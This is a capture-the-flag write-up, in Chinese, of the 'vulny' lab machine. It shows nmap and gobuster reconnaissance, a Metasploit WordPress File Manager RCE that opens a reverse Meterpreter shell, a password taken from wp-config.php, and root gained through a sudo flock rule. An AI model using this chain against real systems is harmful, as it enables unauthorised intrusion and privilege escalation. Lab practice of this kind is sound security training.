vulny

2023-07-26

1.扫描网段：

┌──(root㉿kali)-[/home/ace]
└─# nmap -sP 192.168.56.0/24       
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-26 09:22 CST
Nmap scan report for 192.168.56.1
Host is up (0.0011s latency).
MAC Address: 0A:00:27:00:00:0A (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00035s latency).
MAC Address: 08:00:27:ED:07:63 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.132
Host is up (0.0021s latency).
MAC Address: 08:00:27:15:51:D4 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.127
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.46 seconds

2.扫描端口服务：

Nmap scan report for 192.168.56.132
Host is up (0.0022s latency).
Not shown: 65533 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
| http-methods: 
|_  Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
33060/tcp open  mysqlx?
| fingerprint-strings: 
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp: 
|     Invalid message"
|_    HY000

3.查看一下网页：

又是初始界面，扫目录

4.扫目录：

┌──(root㉿kali)-[/home/ace]
└─# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.56.132          
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.132
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/07/26 09:43:09 Starting gobuster in directory enumeration mode
===============================================================
/javascript           (Status: 301) [Size: 321] [--> http://192.168.56.132/javascript/]
/secret               (Status: 301) [Size: 317] [--> http://192.168.56.132/secret/]
/server-status        (Status: 403) [Size: 279]
Progress: 220225 / 220561 (99.85%)
===============================================================
2023/07/26 09:45:39 Finished
===============================================================

看一下：

5.扫二阶目录

┌──(root㉿kali)-[/home/ace]
└─# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.56.132/secret
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.132/secret
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/07/26 09:49:26 Starting gobuster in directory enumeration mode
===============================================================
/wp-content           (Status: 301) [Size: 328] [--> http://192.168.56.132/secret/wp-content/]
/wp-includes          (Status: 301) [Size: 329] [--> http://192.168.56.132/secret/wp-includes/]
/wp-admin             (Status: 301) [Size: 326] [--> http://192.168.56.132/secret/wp-admin/]
Progress: 220217 / 220561 (99.84%)
===============================================================
2023/07/26 09:52:01 Finished
===============================================================

6.查看一下：

7.msf上有相关漏洞，试试：

msf6 exploit(multi/http/wp_file_manager_rce) > set rhosts 192.168.56.132
rhosts => 192.168.56.132
msf6 exploit(multi/http/wp_file_manager_rce) > set targeturi /secret
targeturi => /secret
msf6 exploit(multi/http/wp_file_manager_rce) > set lhost 192.168.56.127
lhost => 192.168.56.127
msf6 exploit(multi/http/wp_file_manager_rce) > run

[*] Started reverse TCP handler on 192.168.56.127:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: unknown: Cannot reliably check exploitability. "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/wp_file_manager_rce) > set ForceExploit true
ForceExploit => true
msf6 exploit(multi/http/wp_file_manager_rce) > run

[*] Started reverse TCP handler on 192.168.56.127:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Cannot reliably check exploitability. ForceExploit is enabled, proceeding with exploitation.
[*] 192.168.56.132:80 - Payload is at /secret/wp-content/plugins/wp-file-manager/lib/files/4obwHD.php
[*] Sending stage (39927 bytes) to 192.168.56.132
[+] Deleted 4obwHD.php
[*] Meterpreter session 1 opened (192.168.56.127:4444 -> 192.168.56.132:56156) at 2023-07-26 10:00:50 +0800

meterpreter >

python3 -c "import pty;pty.spawn('/bin/bash')"
<ress/wp-content/plugins/wp-file-manager/lib/files$ export TERM=xterm
export TERM=xterm
www-data@vulny:/usr/share/wordpress/wp-content/plugins/wp-file-manager/lib/files$ ls
ls
www-data@vulny:/usr/share/wordpress/wp-content/plugins/wp-file-manager/lib/files$ cd /usr/share/wordpress
www-data@vulny:/usr/share/wordpress$ ls
ls
index.php           wp-comments-post.php  wp-includes        wp-settings.php
readme.html         wp-config-sample.php  wp-links-opml.php  wp-signup.php
wp-activate.php     wp-config.php         wp-load.php        wp-trackback.php
wp-admin            wp-content            wp-login.php       xmlrpc.php
wp-blog-header.php  wp-cron.php           wp-mail.php
www-data@vulny:/usr/share/wordpress$ cat wp-config.php
cat wp-config.php
<?php
/***
 * WordPress's Debianised default master config file
 * Please do NOT edit and learn how the configuration works in
 * /usr/share/doc/wordpress/README.Debian
 ***/

/* Look up a host-specific config file in
 * /etc/wordpress/config-<host>.php or /etc/wordpress/config-<domain>.php
 */
$debian_server = preg_replace('/:.*/', "", $_SERVER['HTTP_HOST']);
$debian_server = preg_replace("/[^a-zA-Z0-9.\-]/", "", $debian_server);
$debian_file = '/etc/wordpress/config-'.strtolower($debian_server).'.php';
/* Main site in case of multisite with subdomains */
$debian_main_server = preg_replace("/^[^.]*\./", "", $debian_server);
$debian_main_file = '/etc/wordpress/config-'.strtolower($debian_main_server).'.php';

if (file_exists($debian_file)) {
    require_once($debian_file);
    define('DEBIAN_FILE', $debian_file);
} elseif (file_exists($debian_main_file)) {
    require_once($debian_main_file);
    define('DEBIAN_FILE', $debian_main_file);
} elseif (file_exists("/etc/wordpress/config-default.php")) {
    require_once("/etc/wordpress/config-default.php");
    define('DEBIAN_FILE', "/etc/wordpress/config-default.php");
} else {
    header("HTTP/1.0 404 Not Found");
    echo "Neither <b>$debian_file</b> nor <b>$debian_main_file</b> could be found. <br/> Ensure one of them exists, is readable by the webserver and contains the right password/username.";
    exit(1);
}

/* idrinksomewater */   ####密码



if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https')
    $_SERVER['HTTPS'] = 'on';

require_once(ABSPATH . 'wp-settings.php');
?>
www-data@vulny:/usr/share/wordpress$ su adrain
su adrain
su: user adrain does not exist
www-data@vulny:/usr/share/wordpress$ su adrian
su adrian
Password: idrinksomewater

adrian@vulny:/usr/share$ cat user.txt
cat user.txt
cat: user.txt: No such file or directory
adrian@vulny:/usr/share$ cd home
cd home
bash: cd: home: No such file or directory
adrian@vulny:/usr/share$ cd ..
cd ..
adrian@vulny:/usr$ cd ..
cd ..
adrian@vulny:/$ ls
ls
bin    dev   lib    libx32      mnt   root  snap      sys  var
boot   etc   lib32  lost+found  opt   run   srv       tmp
cdrom  home  lib64  media       proc  sbin  swap.img  usr
adrian@vulny:/$ cd home
cd home
adrian@vulny:/home$ ls
ls
adrian
adrian@vulny:/home$ cd adrian
cd adrian
adrian@vulny:~$ ls
ls
user.txt
adrian@vulny:~$ cat user.txt
cat user.txt
HMViuploadfiles
adrian@vulny:~$ sudo -l
sudo -l
Matching Defaults entries for adrian on vulny:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User adrian may run the following commands on vulny:
    (ALL : ALL) NOPASSWD: /usr/bin/flock
adrian@vulny:~$ sudo flock -u root /bin/bash
sudo flock -u root /bin/bash
root@vulny:/home/adrian# ls
ls
root  user.txt
root@vulny:/home/adrian# cd root
cd root
bash: cd: root: Not a directory
root@vulny:/home/adrian# cd ..
cd ..
root@vulny:/home# ls
ls
adrian
root@vulny:/home# cd ..
cd ..
root@vulny:/# ls
ls
bin    dev   lib    libx32      mnt   root  snap      sys  var
boot   etc   lib32  lost+found  opt   run   srv       tmp
cdrom  home  lib64  media       proc  sbin  swap.img  usr
root@vulny:/# cd root
cd root
root@vulny:~# ls
ls
root.txt  snap
root@vulny:~# cat root.txt
cat root.txt
HMVididit
root@vulny:~#